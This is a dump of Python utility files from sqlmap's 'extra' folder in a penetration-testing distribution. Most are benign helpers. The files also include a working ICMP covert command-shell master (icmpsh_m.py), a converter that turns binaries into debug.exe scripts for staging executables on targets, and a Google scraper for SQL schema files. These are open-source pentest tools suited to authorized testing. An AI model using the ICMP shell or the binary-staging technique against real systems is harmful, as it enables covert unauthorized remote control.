18,928
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,929
duplicates.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/shutils/duplicates.py
#!/usr/bin/env python # Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission # Removes duplicate entries in wordlist-like files import sys if len(sys.argv) > 1: items = list() with open(sys.argv[1], 'r') as f: for item in f.readlines(): item = item.strip() try: str.encode(item) if item in items: if item: print item else: items.append(item) except: pass with open(sys.argv[1], 'w+') as f: f.writelines("\n".join(items))
681
Python
.py
21
22
64
0.521407
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
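Because duplicates.py tests membership with 'item in items' on a plain list, it is quadratic in the number of lines. Below is a sketch of an order-preserving variant backed by a set for constant-time lookups; this rewrite is an illustration, not part of sqlmap.

import sys

def dedupe(path):
    seen, kept = set(), []
    with open(path, 'r') as f:
        for line in f:
            item = line.strip()
            if item and item not in seen:  # O(1) membership test
                seen.add(item)
                kept.append(item)
    with open(path, 'w') as f:
        f.write("\n".join(kept))

if __name__ == "__main__":
    if len(sys.argv) > 1:
        dedupe(sys.argv[1])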
18,930
regressiontest.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/shutils/regressiontest.py
#!/usr/bin/env python # Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission import codecs import inspect import os import re import smtplib import subprocess import sys import time import traceback from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe())))) from lib.core.revision import getRevisionNumber START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) SQLMAP_HOME = "/opt/sqlmap" REVISION = getRevisionNumber() SMTP_SERVER = "127.0.0.1" SMTP_PORT = 25 SMTP_TIMEOUT = 30 FROM = "regressiontest@sqlmap.org" #TO = "dev@sqlmap.org" TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION) TARGET = "debian" def prepare_email(content): global FROM global TO global SUBJECT msg = MIMEMultipart() msg["Subject"] = SUBJECT msg["From"] = FROM msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) msg.attach(MIMEText(content)) return msg def send_email(msg): global SMTP_SERVER global SMTP_PORT global SMTP_TIMEOUT try: s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT) s.sendmail(FROM, TO, msg.as_string()) s.quit() # Catch all for SMTP exceptions except smtplib.SMTPException, e: print "Failure to send email: %s" % str(e) def failure_email(msg): msg = prepare_email(msg) send_email(msg) sys.exit(1) def main(): global SUBJECT content = "" test_counts = [] attachments = {} updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = updateproc.communicate() if stderr: failure_email("Update of sqlmap failed with error:\n\n%s" % stderr) regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False) stdout, stderr = regressionproc.communicate() if stderr: failure_email("Execution of regression test failed with error:\n\n%s" % stderr) failed_tests = re.findall("running live test case: (.+?) 
\((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) for failed_test in failed_tests: title = failed_test[0] test_count = int(failed_test[1]) parse = failed_test[3] if failed_test[3] else None output_folder = failed_test[4] traceback = False if failed_test[5] == "False" else bool(failed_test[5]) detected = False if failed_test[6] else True test_counts.append(test_count) console_output_file = os.path.join(output_folder, "console_output") log_file = os.path.join(output_folder, TARGET, "log") traceback_file = os.path.join(output_folder, "traceback") if os.path.exists(console_output_file): console_output_fd = codecs.open(console_output_file, "rb", "utf8") console_output = console_output_fd.read() console_output_fd.close() attachments[test_count] = str(console_output) if os.path.exists(log_file): log_fd = codecs.open(log_file, "rb", "utf8") log = log_fd.read() log_fd.close() if os.path.exists(traceback_file): traceback_fd = codecs.open(traceback_file, "rb", "utf8") traceback = traceback_fd.read() traceback_fd.close() content += "Failed test case '%s' (#%d)" % (title, test_count) if parse: content += " at parsing: %s:\n\n" % parse content += "### Log file:\n\n" content += "%s\n\n" % log elif not detected: content += " - SQL injection not detected\n\n" else: content += "\n\n" if traceback: content += "### Traceback:\n\n" content += "%s\n\n" % str(traceback) content += "#######################################################################\n\n" end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) if content: content += end_string SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts)) msg = prepare_email(content) for test_count, attachment in attachments.items(): attachment = MIMEText(attachment) attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count) msg.attach(attachment) send_email(msg) else: SUBJECT = "Successful %s" % SUBJECT msg = prepare_email("All test cases were successful\n\n%s" % end_string) send_email(msg) if __name__ == "__main__": log_fd = open("/tmp/sqlmapregressiontest.log", "wb") log_fd.write("Regression test started at %s\n" % START_TIME) try: main() except Exception, e: log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc())) log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())) log_fd.close()
5,543
Python
.py
126
37.31746
221
0.630904
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,931
pylint.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/shutils/pylint.py
#! /usr/bin/env python # Runs pylint on all python scripts found in a directory tree # Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html import os import re import sys total = 0.0 count = 0 __RATING__ = False def check(module): global total, count if module[-3:] == ".py": print "CHECKING ", module pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') for line in pout: if re.match("E....:.", line): print line if __RATING__ and "Your code has been rated at" in line: print line score = re.findall("\d.\d\d", line)[0] total += float(score) count += 1 if __name__ == "__main__": try: print sys.argv BASE_DIRECTORY = sys.argv[1] except IndexError: print "no directory specified, defaulting to current working directory" BASE_DIRECTORY = os.getcwd() print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY for root, dirs, files in os.walk(BASE_DIRECTORY): if any(_ in root for _ in ("extra", "thirdparty")): continue for name in files: filepath = os.path.join(root, name) check(filepath) if __RATING__: print "==" * 50 print "%d modules found" % count print "AVERAGE SCORE = %.02f" % (total / count)
1,422
Python
.py
40
27.7
79
0.580175
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,932
sqlharvest.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/sqlharvest/sqlharvest.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import cookielib import re import socket import sys import urllib import urllib2 import ConfigParser from operator import itemgetter TIMEOUT = 10 CONFIG_FILE = 'sqlharvest.cfg' TABLES_FILE = 'tables.txt' USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' MAX_FILE_SIZE = 2 * 1024 * 1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it QUERY = 'CREATE TABLE ext:sql' REGEX_URLS = r';u=([^"]+?)&amp;q=' REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)' def main(): tables = dict() cookies = cookielib.CookieJar() cookie_processor = urllib2.HTTPCookieProcessor(cookies) opener = urllib2.build_opener(cookie_processor) opener.addheaders = [("User-Agent", USER_AGENT)] conn = opener.open(SEARCH_URL) page = conn.read() # set initial cookie values config = ConfigParser.ConfigParser() config.read(CONFIG_FILE) if not config.has_section("options"): config.add_section("options") if not config.has_option("options", "index"): config.set("options", "index", "0") i = int(config.get("options", "index")) try: with open(TABLES_FILE, 'r') as f: for line in f.xreadlines(): if len(line) > 0 and ',' in line: temp = line.split(',') tables[temp[0]] = int(temp[1]) except: pass socket.setdefaulttimeout(TIMEOUT) files, old_files = None, None try: while True: abort = False old_files = files files = [] try: conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10)) page = conn.read() for match in re.finditer(REGEX_URLS, page): files.append(urllib.unquote(match.group(1))) if len(files) >= 10: break abort = (files == old_files) except KeyboardInterrupt: raise except Exception, msg: print msg if abort: break sys.stdout.write("\n---------------\n") sys.stdout.write("Result page #%d\n" % (i + 1)) sys.stdout.write("---------------\n") for sqlfile in files: print sqlfile try: req = urllib2.Request(sqlfile) response = urllib2.urlopen(req) if "Content-Length" in response.headers: if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE: continue page = response.read() found = False counter = 0 for match in re.finditer(REGEX_RESULT, page): counter += 1 table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]') if table and not any(_ in table for _ in ('>', '<', '--', ' ')): found = True sys.stdout.write('*') if table in tables: tables[table] += 1 else: tables[table] = 1 if found: sys.stdout.write("\n") except KeyboardInterrupt: raise except Exception, msg: print msg else: i += 1 except KeyboardInterrupt: pass finally: with open(TABLES_FILE, 'w+') as f: tables = sorted(tables.items(), key=itemgetter(1), reverse=True) for table, count in tables: f.write("%s,%d\n" % (table, count)) config.set("options", "index", str(i + 1)) with open(CONFIG_FILE, 'w+') as f: config.write(f) if __name__ == "__main__": main()
4,332
Python
.py
110
27.227273
127
0.504891
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
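REGEX_RESULT above is what pulls table names out of harvested .sql files; a self-contained check of it against a made-up CREATE TABLE statement (Python 2):

import re

# same pattern as in sqlharvest.py
REGEX_RESULT = r"(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)"

sample = "CREATE TABLE IF NOT EXISTS `users` (id INT, name VARCHAR(32));"
match = re.search(REGEX_RESULT, sample)
if match:
    # same normalization step as in the harvester: trim quotes/backticks
    print match.group("result").strip().strip("`\"'")   # prints: users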
18,933
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/sqlharvest/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,934
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/safe2bin/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,935
safe2bin.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/safe2bin/safe2bin.py
#!/usr/bin/env python """ safe2bin.py - Simple safe(hex) to binary format converter Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import binascii import re import string import os import sys from optparse import OptionError from optparse import OptionParser # Regex used for recognition of hex encoded characters HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})" # Regex used for recognition of representation for hex encoded invalid unicode characters INVALID_UNICODE_CHAR_REGEX = r"(?P<result>\\\?[0-9A-Fa-f]{2})" # Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n) SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" # Characters that don't need to be safe encoded SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) # String used for temporary marking of slash characters SLASH_MARKER = "__SLASH__" def safecharencode(value): """ Returns safe representation of a given basestring value >>> safecharencode(u'test123') u'test123' >>> safecharencode(u'test\x01\x02\xff') u'test\\x01\\x02\xff' """ retVal = value if isinstance(value, basestring): if any(_ not in SAFE_CHARS for _ in value): retVal = retVal.replace('\\', SLASH_MARKER) for char in SAFE_ENCODE_SLASH_REPLACEMENTS: retVal = retVal.replace(char, repr(char).strip('\'')) retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) retVal = retVal.replace(SLASH_MARKER, "\\\\") elif isinstance(value, list): for i in xrange(len(value)): retVal[i] = safecharencode(value[i]) return retVal def safechardecode(value, binary=False): """ Reverse function to safecharencode """ retVal = value if isinstance(value, basestring): retVal = retVal.replace('\\\\', SLASH_MARKER) while True: match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) if match: retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) else: break for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: retVal = retVal.replace(repr(char).strip('\''), char) retVal = retVal.replace(SLASH_MARKER, '\\') if binary: if isinstance(retVal, unicode): retVal = retVal.encode("utf8") while True: match = re.search(INVALID_UNICODE_CHAR_REGEX, retVal) if match: retVal = retVal.replace(match.group("result"), chr(ord(binascii.unhexlify(match.group("result").lstrip("\\?"))))) else: break elif isinstance(value, (list, tuple)): for i in xrange(len(value)): retVal[i] = safechardecode(value[i]) return retVal def main(): usage = '%s -i <input file> [-o <output file>]' % sys.argv[0] parser = OptionParser(usage=usage, version='0.1') try: parser.add_option('-i', dest='inputFile', help='Input file') parser.add_option('-o', dest='outputFile', help='Output file') (args, _) = parser.parse_args() if not args.inputFile: parser.error('Missing the input file, -h for help') except (OptionError, TypeError), e: parser.error(e) if not os.path.isfile(args.inputFile): print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile sys.exit(1) f = open(args.inputFile, 'r') data = f.read() f.close() if not args.outputFile: args.outputFile = args.inputFile + '.bin' f = open(args.outputFile, 'wb') f.write(safechardecode(data)) f.close() if __name__ == '__main__': main()
4,106
Python
.py
96
35.572917
208
0.634214
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,936
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/icmpsh/__init__.py
#!/usr/bin/env python # # icmpsh - simple icmp command shell (port of icmpsh-m.pl written in # Perl by Nico Leidecker <nico@leidecker.info>) # # Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com> # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. pass
872
Python
.py
21
40.47619
72
0.758824
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,937
icmpsh_m.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/icmpsh/icmpsh_m.py
#!/usr/bin/env python # # icmpsh - simple icmp command shell (port of icmpsh-m.pl written in # Perl by Nico Leidecker <nico@leidecker.info>) # # Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com> # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os import select import socket import subprocess import sys def setNonBlocking(fd): """ Make a file descriptor non-blocking """ import fcntl flags = fcntl.fcntl(fd, fcntl.F_GETFL) flags = flags | os.O_NONBLOCK fcntl.fcntl(fd, fcntl.F_SETFL, flags) def main(src, dst): if subprocess.mswindows: sys.stderr.write('icmpsh master can only run on Posix systems\n') sys.exit(255) try: from impacket import ImpactDecoder from impacket import ImpactPacket except ImportError: sys.stderr.write('You need to install Python Impacket library first\n') sys.exit(255) # Make standard input a non-blocking file stdin_fd = sys.stdin.fileno() setNonBlocking(stdin_fd) # Open one socket for ICMP protocol # A special option is set on the socket so that IP headers are included # with the returned data try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) except socket.error: sys.stderr.write('You need to run icmpsh master with administrator privileges\n') sys.exit(1) sock.setblocking(0) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # Create a new IP packet and set its source and destination addresses ip = ImpactPacket.IP() ip.set_ip_src(src) ip.set_ip_dst(dst) # Create a new ICMP packet of type ECHO REPLY icmp = ImpactPacket.ICMP() icmp.set_icmp_type(icmp.ICMP_ECHOREPLY) # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() while 1: cmd = '' # Wait for incoming replies if sock in select.select([ sock ], [], [])[0]: buff = sock.recv(4096) if 0 == len(buff): # Socket remotely closed sock.close() sys.exit(0) # Packet received; decode and display it ippacket = decoder.decode(buff) icmppacket = ippacket.child() # If the packet matches, report it to the user if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): # Get identifier and sequence number ident = icmppacket.get_icmp_id() seq_id = icmppacket.get_icmp_seq() data = icmppacket.get_data_as_string() if len(data) > 0: sys.stdout.write(data) # Parse command from standard input try: cmd = sys.stdin.readline() except: pass if cmd == 'exit\n': return # Set sequence number and identifier icmp.set_icmp_id(ident) icmp.set_icmp_seq(seq_id) # Include the command as data inside the ICMP packet icmp.contains(ImpactPacket.Data(cmd)) # Calculate its checksum icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 # Have the IP packet contain the ICMP packet (along with its payload) ip.contains(icmp) # Send it to the target host sock.sendto(ip.get_packet(), (dst, 0)) if __name__ == '__main__': if len(sys.argv) < 3: msg = 'missing mandatory options. 
Execute as root:\n' msg += './icmpsh-m.py <source IP address> <destination IP address>\n' sys.stderr.write(msg) sys.exit(1) main(sys.argv[1], sys.argv[2])
4,448
Python
.py
111
31.585586
113
0.624362
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
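icmpsh_m.py keeps stdin non-blocking so its select() loop never stalls waiting for keyboard input. The fcntl pattern it relies on, isolated for clarity (Python 2, POSIX only):

import fcntl
import os
import sys

fd = sys.stdin.fileno()
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)

try:
    line = sys.stdin.readline()   # returns immediately now
except IOError:
    line = ''                     # raised when no input is pending
print repr(line)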
18,938
dbgtool.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/dbgtool/dbgtool.py
#!/usr/bin/env python """ dbgtool.py - Portable executable to ASCII debug script converter Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import sys import struct from optparse import OptionError from optparse import OptionParser def convert(inputFile): fileStat = os.stat(inputFile) fileSize = fileStat.st_size if fileSize > 65280: print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile sys.exit(1) script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) script += "%x\nf 0100 ffff 00\n" % fileSize scrString = "" counter = 256 counter2 = 0 fp = open(inputFile, "rb") fileContent = fp.read() for fileChar in fileContent: unsignedFileChar = struct.unpack("B", fileChar)[0] if unsignedFileChar != 0: counter2 += 1 if not scrString: scrString = "e %0x %02x" % (counter, unsignedFileChar) else: scrString += " %02x" % unsignedFileChar elif scrString: script += "%s\n" % scrString scrString = "" counter2 = 0 counter += 1 if counter2 == 20: script += "%s\n" % scrString scrString = "" counter2 = 0 script += "w\nq\n" return script def main(inputFile, outputFile): if not os.path.isfile(inputFile): print "ERROR: the provided input file '%s' is not a regular file" % inputFile sys.exit(1) script = convert(inputFile) if outputFile: fpOut = open(outputFile, "w") sys.stdout = fpOut sys.stdout.write(script) sys.stdout.close() else: print script if __name__ == "__main__": usage = "%s -i <input file> [-o <output file>]" % sys.argv[0] parser = OptionParser(usage=usage, version="0.1") try: parser.add_option("-i", dest="inputFile", help="Input binary file") parser.add_option("-o", dest="outputFile", help="Output debug.exe text file") (args, _) = parser.parse_args() if not args.inputFile: parser.error("Missing the input file, -h for help") except (OptionError, TypeError), e: parser.error(e) inputFile = args.inputFile outputFile = args.outputFile main(inputFile, outputFile)
2,420
Python
.py
69
27.898551
88
0.614194
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
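Since dbgtool.py only defines functions at module level (the CLI lives behind the __main__ guard), convert() can be imported and exercised directly. A sketch assuming the script sits on the import path; the stub file name is made up:

import os
from dbgtool import convert

with open("stub.com", "wb") as f:
    f.write("\x90\x90\xc3")       # NOP, NOP, RET: a 3-byte fake binary

print convert("stub.com")         # prints the generated debug.exe script
os.remove("stub.com")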
18,939
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/dbgtool/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,940
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/beep/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,941
beep.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/beep/beep.py
#!/usr/bin/env python """ beep.py - Make a beep sound Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import subprocess import sys import wave BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav") def beep(): try: if subprocess.mswindows: _win_wav_play(BEEP_WAV_FILENAME) elif sys.platform == "darwin": _mac_beep() elif sys.platform == "linux2": _linux_wav_play(BEEP_WAV_FILENAME) else: _speaker_beep() except: _speaker_beep() def _speaker_beep(): sys.stdout.write('\a') # doesn't work on modern Linux systems try: sys.stdout.flush() except IOError: pass def _mac_beep(): import Carbon.Snd Carbon.Snd.SysBeep(1) def _win_wav_play(filename): import winsound winsound.PlaySound(filename, winsound.SND_FILENAME) def _linux_wav_play(filename): import ctypes PA_STREAM_PLAYBACK = 1 PA_SAMPLE_S16LE = 3 BUFFSIZE = 1024 class struct_pa_sample_spec(ctypes.Structure): _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)] pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") wave_file = wave.open(filename, "rb") pa_sample_spec = struct_pa_sample_spec() pa_sample_spec.rate = wave_file.getframerate() pa_sample_spec.channels = wave_file.getnchannels() pa_sample_spec.format = PA_SAMPLE_S16LE error = ctypes.c_int(0) pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error)) if not pa_stream: raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error))) while True: latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error)) if latency == -1: raise Exception("Getting latency failed") buf = wave_file.readframes(BUFFSIZE) if not buf: break if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)): raise Exception("Could not play file") wave_file.close() if pa.pa_simple_drain(pa_stream, ctypes.byref(error)): raise Exception("Could not simple drain") pa.pa_simple_free(pa_stream) if __name__ == "__main__": beep()
2,427
Python
.py
67
30.134328
149
0.653961
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,942
update.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/mssqlsig/update.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import codecs import os import re import urllib2 import urlparse from xml.dom.minidom import Document # Path to the XML file with signatures MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") # Url to update Microsoft SQL Server XML versions file from MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" def updateMSSQLXML(): if not os.path.exists(MSSQL_XML): errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML print errMsg return infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL print infoMsg try: req = urllib2.Request(MSSQL_VERSIONS_URL) f = urllib2.urlopen(req) mssqlVersionsHtmlString = f.read() f.close() except urllib2.URLError: __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) __mssqlHostname = __mssqlPath[1] warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname warnMsg += " check your Internet connection and retry" print warnMsg return releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) releasesCount = len(releases) # Create the minidom document doc = Document() # Create the <root> base element root = doc.createElement("root") doc.appendChild(root) for index in xrange(0, releasesCount): release = releases[index] # Skip Microsoft SQL Server 6.5 because the HTML # table is in another format if release == "6.5": continue # Create the <signatures> base element signatures = doc.createElement("signatures") signatures.setAttribute("release", release) root.appendChild(signatures) startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) if index == releasesCount - 1: stopIdx = len(mssqlVersionsHtmlString) else: stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] servicepackVersion = re.findall("</td><td>[7\.0|2000|2005|2008|2008 R2]*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) for servicePack, version in servicepackVersion: if servicePack.startswith(" "): servicePack = servicePack[1:] if "/" in servicePack: servicePack = servicePack[:servicePack.index("/")] if "(" in servicePack: servicePack = servicePack[:servicePack.index("(")] if "-" in servicePack: servicePack = servicePack[:servicePack.index("-")] if "*" in servicePack: servicePack = servicePack[:servicePack.index("*")] if servicePack.startswith("+"): servicePack = "0%s" % servicePack servicePack = servicePack.replace("\t", " ") servicePack = servicePack.replace("No SP", "0") servicePack = servicePack.replace("RTM", "0") servicePack = servicePack.replace("TM", "0") servicePack = servicePack.replace("SP", "") servicePack = servicePack.replace("Service Pack", "") servicePack = servicePack.replace("<a href=\"http:", "") servicePack = servicePack.replace(" ", " ") servicePack = servicePack.replace("+ ", "+") servicePack = servicePack.replace(" +", "+") if servicePack.endswith(" "): servicePack = servicePack[:-1] if servicePack and version: # Create the main <signature> element signature = doc.createElement("signature") signatures.appendChild(signature) # Create a <version> element versionElement = doc.createElement("version") signature.appendChild(versionElement) # Give the <version> element some text versionText = doc.createTextNode(version) versionElement.appendChild(versionText) # Create a <servicepack> element servicepackElement = doc.createElement("servicepack") signature.appendChild(servicepackElement) # Give the <servicepack> element some text servicepackText = doc.createTextNode(servicePack) servicepackElement.appendChild(servicepackText) # Save our newly created XML to the signatures file mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") doc.writexml(writer=mssqlXml, addindent="    ", newl="\n") mssqlXml.close() infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML print infoMsg if __name__ == "__main__": updateMSSQLXML()
5,123
Python
.py
107
38.186916
160
0.630365
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
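The XML construction in update.py is plain xml.dom.minidom; stripped to its skeleton it looks like the following (Python 2), with placeholder release/version values:

from xml.dom.minidom import Document

doc = Document()
root = doc.createElement("root")
doc.appendChild(root)

# one <signatures> node per release, as in updateMSSQLXML()
signatures = doc.createElement("signatures")
signatures.setAttribute("release", "2005")
root.appendChild(signatures)

signature = doc.createElement("signature")
signatures.appendChild(signature)
version = doc.createElement("version")
version.appendChild(doc.createTextNode("9.00.1399.06"))
signature.appendChild(version)

print doc.toprettyxml(indent="    ")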
